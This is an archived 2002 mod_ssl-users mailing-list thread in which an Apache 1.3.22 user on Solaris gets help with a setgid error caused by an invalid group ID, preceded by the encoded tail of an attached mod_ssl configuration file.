dGhlIENBIHJldm9jYXRpb24gcGF0aCB3aGVyZSB0byBmaW5kIENBIENSTHMgZm9yIGNsaWVudAoj ICAgYXV0aGVudGljYXRpb24gb3IgYWx0ZXJuYXRpdmVseSBvbmUgaHVnZSBmaWxlIGNvbnRhaW5p bmcgYWxsCiMgICBvZiB0aGVtIChmaWxlIG11c3QgYmUgUEVNIGVuY29kZWQpCiMgICBOb3RlOiBJ bnNpZGUgU1NMQ0FSZXZvY2F0aW9uUGF0aCB5b3UgbmVlZCBoYXNoIHN5bWxpbmtzCiMgICAgICAg ICB0byBwb2ludCB0byB0aGUgY2VydGlmaWNhdGUgZmlsZXMuIFVzZSB0aGUgcHJvdmlkZWQKIyAg ICAgICAgIE1ha2VmaWxlIHRvIHVwZGF0ZSB0aGUgaGFzaCBzeW1saW5rcyBhZnRlciBjaGFuZ2Vz LgojU1NMQ0FSZXZvY2F0aW9uUGF0aCAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NvbmYv c3NsLmNybAojU1NMQ0FSZXZvY2F0aW9uRmlsZSAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hl L2NvbmYvc3NsLmNybC9jYS1idW5kbGUuY3JsCgojICAgQ2xpZW50IEF1dGhlbnRpY2F0aW9uIChU eXBlKToKIyAgIENsaWVudCBjZXJ0aWZpY2F0ZSB2ZXJpZmljYXRpb24gdHlwZSBhbmQgZGVwdGgu ICBUeXBlcyBhcmUKIyAgIG5vbmUsIG9wdGlvbmFsLCByZXF1aXJlIGFuZCBvcHRpb25hbF9ub19j YS4gIERlcHRoIGlzIGEKIyAgIG51bWJlciB3aGljaCBzcGVjaWZpZXMgaG93IGRlZXBseSB0byB2 ZXJpZnkgdGhlIGNlcnRpZmljYXRlCiMgICBpc3N1ZXIgY2hhaW4gYmVmb3JlIGRlY2lkaW5nIHRo ZSBjZXJ0aWZpY2F0ZSBpcyBub3QgdmFsaWQuCiNTU0xWZXJpZnlDbGllbnQgcmVxdWlyZQojU1NM VmVyaWZ5RGVwdGggIDEwCgojICAgQWNjZXNzIENvbnRyb2w6CiMgICBXaXRoIFNTTFJlcXVpcmUg eW91IGNhbiBkbyBwZXItZGlyZWN0b3J5IGFjY2VzcyBjb250cm9sIGJhc2VkCiMgICBvbiBhcmJp dHJhcnkgY29tcGxleCBib29sZWFuIGV4cHJlc3Npb25zIGNvbnRhaW5pbmcgc2VydmVyCiMgICB2 YXJpYWJsZSBjaGVja3MgYW5kIG90aGVyIGxvb2t1cCBkaXJlY3RpdmVzLiAgVGhlIHN5bnRheCBp cyBhCiMgICBtaXh0dXJlIGJldHdlZW4gQyBhbmQgUGVybC4gIFNlZSB0aGUgbW9kX3NzbCBkb2N1 bWVudGF0aW9uCiMgICBmb3IgbW9yZSBkZXRhaWxzLgojPExvY2F0aW9uIC8+CiNTU0xSZXF1aXJl ICggICAgJXtTU0xfQ0lQSEVSfSAhfiBtL14oRVhQfE5VTEwpLyBcCiMgICAgICAgICAgICBhbmQg JXtTU0xfQ0xJRU5UX1NfRE5fT30gZXEgIlNuYWtlIE9pbCwgTHRkLiIgXAojICAgICAgICAgICAg YW5kICV7U1NMX0NMSUVOVF9TX0ROX09VfSBpbiB7IlN0YWZmIiwgIkNBIiwgIkRldiJ9IFwKIyAg ICAgICAgICAgIGFuZCAle1RJTUVfV0RBWX0gPj0gMSBhbmQgJXtUSU1FX1dEQVl9IDw9IDUgXAoj ICAgICAgICAgICAgYW5kICV7VElNRV9IT1VSfSA+PSA4IGFuZCAle1RJTUVfSE9VUn0gPD0gMjAg ICAgICAgKSBcCiMgICAgICAgICAgIG9yICV7UkVNT1RFX0FERFJ9ID1+IG0vXjE5MlwuNzZcLjE2 MlwuWzAtOV0rJC8KIzwvTG9jYXRpb24+CgojICAgU1NMIEVuZ2luZSBPcHRpb25zOgojICAgU2V0 IHZhcmlvdXMgb3B0aW9ucyBmb3IgdGhlIFNTTCBlbmdpbmUuCiMgICBvIEZha2VCYXNpY0F1dGg6 CiMgICAgIFRyYW5zbGF0ZSB0aGUgY2xpZW50IFguNTA5IGludG8gYSBCYXNpYyBBdXRob3Jpc2F0 aW9uLiAgVGhpcyBtZWFucyB0aGF0CiMgICAgIHRoZSBzdGFuZGFyZCBBdXRoL0RCTUF1dGggbWV0 aG9kcyBjYW4gYmUgdXNlZCBmb3IgYWNjZXNzIGNvbnRyb2wuICBUaGUKIyAgICAgdXNlciBuYW1l IGlzIHRoZSBgb25lIGxpbmUnIHZlcnNpb24gb2YgdGhlIGNsaWVudCdzIFguNTA5IGNlcnRpZmlj YXRlLgojICAgICBOb3RlIHRoYXQgbm8gcGFzc3dvcmQgaXMgb2J0YWluZWQgZnJvbSB0aGUgdXNl ci4gRXZlcnkgZW50cnkgaW4gdGhlIHVzZXIKIyAgICAgZmlsZSBuZWVkcyB0aGlzIHBhc3N3b3Jk OiBgeHhqMzFaTVRaemtWQScuCiMgICBvIEV4cG9ydENlcnREYXRhOgojICAgICBUaGlzIGV4cG9y dHMgdHdvIGFkZGl0aW9uYWwgZW52aXJvbm1lbnQgdmFyaWFibGVzOiBTU0xfQ0xJRU5UX0NFUlQg YW5kCiMgICAgIFNTTF9TRVJWRVJfQ0VSVC4gVGhlc2UgY29udGFpbiB0aGUgUEVNLWVuY29kZWQg Y2VydGlmaWNhdGVzIG9mIHRoZQojICAgICBzZXJ2ZXIgKGFsd2F5cyBleGlzdGluZykgYW5kIHRo ZSBjbGllbnQgKG9ubHkgZXhpc3Rpbmcgd2hlbiBjbGllbnQKIyAgICAgYXV0aGVudGljYXRpb24g aXMgdXNlZCkuIFRoaXMgY2FuIGJlIHVzZWQgdG8gaW1wb3J0IHRoZSBjZXJ0aWZpY2F0ZXMKIyAg ICAgaW50byBDR0kgc2NyaXB0cy4KIyAgIG8gU3RkRW52VmFyczoKIyAgICAgVGhpcyBleHBvcnRz IHRoZSBzdGFuZGFyZCBTU0wvVExTIHJlbGF0ZWQgYFNTTF8qJyBlbnZpcm9ubWVudCB2YXJpYWJs ZXMuCiMgICAgIFBlciBkZWZhdWx0IHRoaXMgZXhwb3J0YXRpb24gaXMgc3dpdGNoZWQgb2ZmIGZv ciBwZXJmb3JtYW5jZSByZWFzb25zLAojICAgICBiZWNhdXNlIHRoZSBleHRyYWN0aW9uIHN0ZXAg aXMgYW4gZXhwZW5zaXZlIG9wZXJhdGlvbiBhbmQgaXMgdXN1YWxseQojICAgICB1c2VsZXNzIGZv ciBzZXJ2aW5nIHN0YXRpYyBjb250ZW50LiBTbyBvbmUgdXN1YWxseSBlbmFibGVzIHRoZQojICAg ICBleHBvcnRhdGlvbiBmb3IgQ0dJIGFuZCBTU0kgcmVxdWVzdHMgb25seS4KIyAgIG8gQ29tcGF0 RW52VmFyczoKIyAgICAgVGhpcyBleHBvcnRzIG9ic29sZXRlIGVudmlyb25tZW50IHZhcmlhYmxl cyBmb3IgYmFja3dhcmQgY29tcGF0aWJpbGl0eQojICAgICB0byBBcGFjaGUtU1NMIDEueCwgbW9k X3NzbCAyLjAueCwgU2lvdXggMS4wIGFuZCBTdHJvbmdob2xkIDIueC4gVXNlIHRoaXMKIyAgICAg dG8gcHJvdmlkZSBjb21wYXRpYmlsaXR5IHRvIGV4aXN0aW5nIENHSSBzY3JpcHRzLgojICAgbyBT dHJpY3RSZXF1aXJlOgojICAgICBUaGlzIGRlbmllcyBhY2Nlc3Mgd2hlbiAiU1NMUmVxdWlyZVNT TCIgb3IgIlNTTFJlcXVpcmUiIGFwcGxpZWQgZXZlbgojICAgICB1bmRlciBhICJTYXRpc2Z5IGFu eSIgc2l0dWF0aW9uLCBpLmUuIHdoZW4gaXQgYXBwbGllcyBhY2Nlc3MgaXMgZGVuaWVkCiMgICAg IGFuZCBubyBvdGhlciBtb2R1bGUgY2FuIGNoYW5nZSBpdC4KIyAgIG8gT3B0UmVuZWdvdGlhdGU6 CiMgICAgIFRoaXMgZW5hYmxlcyBvcHRpbWl6ZWQgU1NMIGNvbm5lY3Rpb24gcmVuZWdvdGlhdGlv biBoYW5kbGluZyB3aGVuIFNTTAojICAgICBkaXJlY3RpdmVzIGFyZSB1c2VkIGluIHBlci1kaXJl Y3RvcnkgY29udGV4dC4gCiNTU0xPcHRpb25zICtGYWtlQmFzaWNBdXRoICtFeHBvcnRDZXJ0RGF0 YSArQ29tcGF0RW52VmFycyArU3RyaWN0UmVxdWlyZQo8RmlsZXMgfiAiXC4oY2dpfHNodG1sfHBo dG1sfHBocDM/KSQiPgogICAgU1NMT3B0aW9ucyArU3RkRW52VmFycwo8L0ZpbGVzPgo8RGlyZWN0 b3J5ICIvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NnaS1iaW4iPgogICAgU1NMT3B0aW9u cyArU3RkRW52VmFycwo8L0RpcmVjdG9yeT4KCiMgICBTU0wgUHJvdG9jb2wgQWRqdXN0bWVudHM6 CiMgICBUaGUgc2FmZSBhbmQgZGVmYXVsdCBidXQgc3RpbGwgU1NML1RMUyBzdGFuZGFyZCBjb21w bGlhbnQgc2h1dGRvd24KIyAgIGFwcHJvYWNoIGlzIHRoYXQgbW9kX3NzbCBzZW5kcyB0aGUgY2xv c2Ugbm90aWZ5IGFsZXJ0IGJ1dCBkb2Vzbid0IHdhaXQgZm9yCiMgICB0aGUgY2xvc2Ugbm90aWZ5 IGFsZXJ0IGZyb20gY2xpZW50LiBXaGVuIHlvdSBuZWVkIGEgZGlmZmVyZW50IHNodXRkb3duCiMg ICBhcHByb2FjaCB5b3UgY2FuIHVzZSBvbmUgb2YgdGhlIGZvbGxvd2luZyB2YXJpYWJsZXM6CiMg ICBvIHNzbC11bmNsZWFuLXNodXRkb3duOgojICAgICBUaGlzIGZvcmNlcyBhbiB1bmNsZWFuIHNo dXRkb3duIHdoZW4gdGhlIGNvbm5lY3Rpb24gaXMgY2xvc2VkLCBpLmUuIG5vCiMgICAgIFNTTCBj bG9zZSBub3RpZnkgYWxlcnQgaXMgc2VuZCBvciBhbGxvd2VkIHRvIHJlY2VpdmVkLiAgVGhpcyB2 aW9sYXRlcwojICAgICB0aGUgU1NML1RMUyBzdGFuZGFyZCBidXQgaXMgbmVlZGVkIGZvciBzb21l IGJyYWluLWRlYWQgYnJvd3NlcnMuIFVzZQojICAgICB0aGlzIHdoZW4geW91IHJlY2VpdmUgSS9P IGVycm9ycyBiZWNhdXNlIG9mIHRoZSBzdGFuZGFyZCBhcHByb2FjaCB3aGVyZQojICAgICBtb2Rf c3NsIHNlbmRzIHRoZSBjbG9zZSBub3RpZnkgYWxlcnQuCiMgICBvIHNzbC1hY2N1cmF0ZS1zaHV0 ZG93bjoKIyAgICAgVGhpcyBmb3JjZXMgYW4gYWNjdXJhdGUgc2h1dGRvd24gd2hlbiB0aGUgY29u bmVjdGlvbiBpcyBjbG9zZWQsIGkuZS4gYQojICAgICBTU0wgY2xvc2Ugbm90aWZ5IGFsZXJ0IGlz IHNlbmQgYW5kIG1vZF9zc2wgd2FpdHMgZm9yIHRoZSBjbG9zZSBub3RpZnkKIyAgICAgYWxlcnQg b2YgdGhlIGNsaWVudC4gVGhpcyBpcyAxMDAlIFNTTC9UTFMgc3RhbmRhcmQgY29tcGxpYW50LCBi dXQgaW4KIyAgICAgcHJhY3RpY2Ugb2Z0ZW4gY2F1c2VzIGhhbmdpbmcgY29ubmVjdGlvbnMgd2l0 aCBicmFpbi1kZWFkIGJyb3dzZXJzLiBVc2UKIyAgICAgdGhpcyBvbmx5IGZvciBicm93c2VycyB3 aGVyZSB5b3Uga25vdyB0aGF0IHRoZWlyIFNTTCBpbXBsZW1lbnRhdGlvbgojICAgICB3b3JrcyBj b3JyZWN0bHkuIAojICAgTm90aWNlOiBNb3N0IHByb2JsZW1zIG9mIGJyb2tlbiBjbGllbnRzIGFy ZSBhbHNvIHJlbGF0ZWQgdG8gdGhlIEhUVFAKIyAgIGtlZXAtYWxpdmUgZmFjaWxpdHksIHNvIHlv dSB1c3VhbGx5IGFkZGl0aW9uYWxseSB3YW50IHRvIGRpc2FibGUKIyAgIGtlZXAtYWxpdmUgZm9y IHRob3NlIGNsaWVudHMsIHRvby4gVXNlIHZhcmlhYmxlICJub2tlZXBhbGl2ZSIgZm9yIHRoaXMu CiMgICBTaW1pbGFybHksIG9uZSBoYXMgdG8gZm9yY2Ugc29tZSBjbGllbnRzIHRvIHVzZSBIVFRQ LzEuMCB0byB3b3JrYXJvdW5kCiMgICB0aGVpciBicm9rZW4gSFRUUC8xLjEgaW1wbGVtZW50YXRp b24uIFVzZSB2YXJpYWJsZXMgImRvd25ncmFkZS0xLjAiIGFuZAojICAgImZvcmNlLXJlc3BvbnNl LTEuMCIgZm9yIHRoaXMuClNldEVudklmIFVzZXItQWdlbnQgIi4qTVNJRS4qIiBcCiAgICAgICAg IG5va2VlcGFsaXZlIHNzbC11bmNsZWFuLXNodXRkb3duIFwKICAgICAgICAgZG93bmdyYWRlLTEu MCBmb3JjZS1yZXNwb25zZS0xLjAKCiMgICBQZXItU2VydmVyIExvZ2dpbmc6CiMgICBUaGUgaG9t ZSBvZiBhIGN1c3RvbSBTU0wgbG9nIGZpbGUuIFVzZSB0aGlzIHdoZW4geW91IHdhbnQgYQojICAg Y29tcGFjdCBub24tZXJyb3IgU1NMIGxvZ2ZpbGUgb24gYSB2aXJ0dWFsIGhvc3QgYmFzaXMuCkN1 c3RvbUxvZyAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2xvZ3Mvc3NsX3JlcXVlc3RfbG9n IFwKICAgICAgICAgICIldCAlaCAle1NTTF9QUk9UT0NPTH14ICV7U1NMX0NJUEhFUn14IFwiJXJc IiAlYiIKCjwvVmlydHVhbEhvc3Q+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAoK PC9JZkRlZmluZT4KCg== ------=_NextPart_000_C5FDD_01C1C43A.C16BF6B0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 6 06:31:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA15286; Wed, 6 Mar 2002 06:30:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns01.taggis.com id GAA15220; Wed, 6 Mar 2002 06:29:57 +0100 (MET) Received: from taggis.com (ns01.taggis.com [209.180.175.133]) by ns01.taggis.com (8.11.6+Sun/8.9.1) with ESMTP id g265Smn00926 for ; Tue, 5 Mar 2002 21:28:48 -0800 (PST) Message-ID: <3C85A90F.E2E9FF4E@taggis.com> Date: Tue, 05 Mar 2002 21:28:47 -0800 From: Mark X-Mailer: Mozilla 4.51 [en] (X11; I; SunOS 5.7 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: "modssl-users@modssl.org" Subject: I have know idea on this one Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mark X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Tue Mar 5 21:11:21 2002] [warn] pid file /usr/local/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run? [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable to set group id to Group 4294967295 [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable to set group id to Group 4294967295 [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable to set group id to Group 4294967295 [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable to set group id to Group 4294967295 [Tue Mar 5 21:11:21 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.6b configured -- resuming normal operations [Tue Mar 5 21:11:21 2002] [notice] Accept mutex: fcntl (Default: fcntl) [Tue Mar 5 21:11:21 2002] [alert] Child 777 returned a Fatal error... Apache is exiting! [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable to set group id to Group 4294967295 [Tue Mar 5 21:22:19 2002] [warn] pid file /usr/local/apache/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run? [Tue Mar 5 21:22:19 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.6b configured -- resuming normal operations [Tue Mar 5 21:22:19 2002] [notice] Accept mutex: fcntl (Default: fcntl) Running on Sun platform. I have re-done everything with different permission settings and not changes. I have a group called apache and an user called apache. ( this was recommended for someone else ) and still the same problem. I can't any info on it either. Any guru's like to shed a little light? Mark ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 6 06:54:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA17094; Wed, 6 Mar 2002 06:53:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id GAA17038; Wed, 6 Mar 2002 06:52:43 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g265pVw01496 for ; Wed, 6 Mar 2002 00:51:31 -0500 Date: Wed, 6 Mar 2002 00:51:31 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: "modssl-users@modssl.org" Subject: Re: I have know idea on this one In-Reply-To: <3C85A90F.E2E9FF4E@taggis.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 5 Mar 2002, Mark wrote: > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > to set group id to Group 4294967295 > [Tue Mar 5 21:11:21 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 Your system does not support a GID of -1 (2^32-1 = 429467295). Apache's install scripts are supposed to test your system to see whether it supports this GID or not and pick a different one if it doesn't, but due to a bug in the install script in Apache 1.3.22, that feature was broken in that release. So just go into your config file and pick a different gid, and you'll be set (or upgrade to a newer Apache ;). --Cliff -------------------------------------------------------------- Cliff Woolley Apache HTTP Server Project jwoolley@apache.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 6 06:59:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA17540; Wed, 6 Mar 2002 06:58:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtpzilla2.xs4all.nl id GAA17504; Wed, 6 Mar 2002 06:58:03 +0100 (MET) Received: from ws (gondelach.xs4all.nl [213.84.219.199]) by smtpzilla2.xs4all.nl (8.12.0/8.12.0) with SMTP id g265vvPC040754 for ; Wed, 6 Mar 2002 06:58:02 +0100 (CET) Message-ID: <000d01c1c4d3$c6b07080$0200a8c0@ws> From: "Casper Gondelach" To: References: <3C85A90F.E2E9FF4E@taggis.com> Subject: Re: I have know idea on this one Date: Wed, 6 Mar 2002 06:57:10 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Casper Gondelach" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users If i see so, it seems that the group id 4294967295 is FAR to high.. this highest number is something around 64000 i thought. Just lower it. Casper ----- Original Message ----- From: "Mark" To: Sent: Wednesday, March 06, 2002 6:28 AM Subject: I have know idea on this one > Tue Mar 5 21:11:21 2002] [warn] pid file > /usr/local/apache/logs/httpd.pid overwritten -- Unclean shutdown of > previous Apache run? > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > to set group id to Group 4294967295 > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > to set group id to Group 4294967295 > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > to set group id to Group 4294967295 > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > to set group id to Group 4294967295 > [Tue Mar 5 21:11:21 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 > OpenSSL/0.9.6b configured -- resuming normal operations > [Tue Mar 5 21:11:21 2002] [notice] Accept mutex: fcntl (Default: fcntl) > > [Tue Mar 5 21:11:21 2002] [alert] Child 777 returned a Fatal error... > Apache is exiting! > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > to set group id to Group 4294967295 > [Tue Mar 5 21:22:19 2002] [warn] pid file > /usr/local/apache/logs/httpd.pid overwritten -- Unclean shutdown of > previous Apache run? > [Tue Mar 5 21:22:19 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 > OpenSSL/0.9.6b configured -- resuming normal operations > [Tue Mar 5 21:22:19 2002] [notice] Accept mutex: fcntl (Default: fcntl) > > Running on Sun platform. I have re-done everything with different > permission settings and not changes. I have a group called apache and an > user called apache. ( this was recommended for someone else ) and still > the same problem. > > I can't any info on it either. Any guru's like to shed a little light? > > Mark > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 6 07:02:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA17808; Wed, 6 Mar 2002 07:01:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns01.taggis.com id HAA17716; Wed, 6 Mar 2002 07:00:24 +0100 (MET) Received: from taggis.com (hagar.taggis.com [10.0.0.40]) by ns01.taggis.com (8.11.6+Sun/8.9.1) with ESMTP id g265xFn01148 for ; Tue, 5 Mar 2002 21:59:15 -0800 (PST) Message-ID: <3C85B2D8.A9AA6D03@taggis.com> Date: Tue, 05 Mar 2002 22:10:32 -0800 From: "Mark J. Matheson" Organization: Howell Spatial Industries X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: I have know idea on this one References: Content-Type: multipart/mixed; boundary="------------2002EDBF579EE70BFF923701" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mark J. Matheson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. --------------2002EDBF579EE70BFF923701 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Cliff Woolley wrote: > On Tue, 5 Mar 2002, Mark wrote: > > > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > > to set group id to Group 4294967295 > > [Tue Mar 5 21:11:21 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 > > Your system does not support a GID of -1 (2^32-1 = 429467295). Apache's > install scripts are supposed to test your system to see whether it > supports this GID or not and pick a different one if it doesn't, but due > to a bug in the install script in Apache 1.3.22, that feature was broken > in that release. So just go into your config file and pick a different > gid, and you'll be set (or upgrade to a newer Apache ;). > > --Cliff > > -------------------------------------------------------------- > Cliff Woolley > Apache HTTP Server Project > jwoolley@apache.org > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org Thank you, Sir..much appreciated --------------2002EDBF579EE70BFF923701 Content-Type: text/x-vcard; charset=us-ascii; name="markmath.vcf" Content-Description: Card for Mark J. Matheson Content-Disposition: attachment; filename="markmath.vcf" Content-Transfer-Encoding: 7bit begin:vcard n:Matheson;Mark J. tel;cell:503.803.5712 tel;fax:503.650.5066 tel;work:503.722.7416 x-mozilla-html:FALSE url:www.GISjobs.com.au org:Howell Spatial Industries;USA Branch adr:;;855 Molalla Ave.;Oregon City;Or;97045;USA version:2.1 email;internet:markmath@taggis.com title:Executive Manager fn:Mark J. Matheson end:vcard --------------2002EDBF579EE70BFF923701-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 6 07:17:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA19482; Wed, 6 Mar 2002 07:16:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns01.taggis.com id HAA19437; Wed, 6 Mar 2002 07:15:47 +0100 (MET) Received: from taggis.com (hagar.taggis.com [10.0.0.40]) by ns01.taggis.com (8.11.6+Sun/8.9.1) with ESMTP id g266Ecn01333 for ; Tue, 5 Mar 2002 22:14:38 -0800 (PST) Message-ID: <3C85B672.47B1825C@taggis.com> Date: Tue, 05 Mar 2002 22:25:54 -0800 From: "Mark J. Matheson" Organization: Howell Spatial Industries X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: I have know idea on this one References: <3C85A90F.E2E9FF4E@taggis.com> <000d01c1c4d3$c6b07080$0200a8c0@ws> Content-Type: multipart/mixed; boundary="------------9D0D2C9E8FD780BD4921FC11" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mark J. Matheson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. --------------9D0D2C9E8FD780BD4921FC11 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Casper Gondelach wrote: > If i see so, it seems that the group id 4294967295 is FAR to high.. this > highest number is something around 64000 i thought. Just lower it. > > Casper > > ----- Original Message ----- > From: "Mark" > To: > Sent: Wednesday, March 06, 2002 6:28 AM > Subject: I have know idea on this one > > > Tue Mar 5 21:11:21 2002] [warn] pid file > > /usr/local/apache/logs/httpd.pid overwritten -- Unclean shutdown of > > previous Apache run? > > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > > to set group id to Group 4294967295 > > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > > to set group id to Group 4294967295 > > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > > to set group id to Group 4294967295 > > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > > to set group id to Group 4294967295 > > [Tue Mar 5 21:11:21 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 > > OpenSSL/0.9.6b configured -- resuming normal operations > > [Tue Mar 5 21:11:21 2002] [notice] Accept mutex: fcntl (Default: fcntl) > > > > [Tue Mar 5 21:11:21 2002] [alert] Child 777 returned a Fatal error... > > Apache is exiting! > > [Tue Mar 5 21:11:21 2002] [alert] (22)Invalid argument: setgid: unable > > to set group id to Group 4294967295 > > [Tue Mar 5 21:22:19 2002] [warn] pid file > > /usr/local/apache/logs/httpd.pid overwritten -- Unclean shutdown of > > previous Apache run? > > [Tue Mar 5 21:22:19 2002] [notice] Apache/1.3.22 (Unix) mod_ssl/2.8.5 > > OpenSSL/0.9.6b configured -- resuming normal operations > > [Tue Mar 5 21:22:19 2002] [notice] Accept mutex: fcntl (Default: fcntl) > > > > Running on Sun platform. I have re-done everything with different > > permission settings and not changes. I have a group called apache and an > > user called apache. ( this was recommended for someone else ) and still > > the same problem. > > > > I can't any info on it either. Any guru's like to shed a little light? > > > > Mark > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org Thanks for the info...Cliff had the same advice and it is working just fine...thank you...I just have ANOTHER learning curve to go through --------------9D0D2C9E8FD780BD4921FC11 Content-Type: text/x-vcard; charset=us-ascii; name="markmath.vcf" Content-Description: Card for Mark J. Matheson Content-Disposition: attachment; filename="markmath.vcf" Content-Transfer-Encoding: 7bit begin:vcard n:Matheson;Mark J. tel;cell:503.803.5712 tel;fax:503.650.5066 tel;work:503.722.7416 x-mozilla-html:FALSE url:www.GISjobs.com.au org:Howell Spatial Industries;USA Branch adr:;;855 Molalla Ave.;Oregon City;Or;97045;USA version:2.1 email;internet:markmath@taggis.com title:Executive Manager fn:Mark J. Matheson end:vcard --------------9D0D2C9E8FD780BD4921FC11-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 6 20:28:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA06326; Wed, 6 Mar 2002 20:27:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA06296; Wed, 6 Mar 2002 20:26:31 +0100 (MET) Received: by visp.engelschall.com (Postfix, 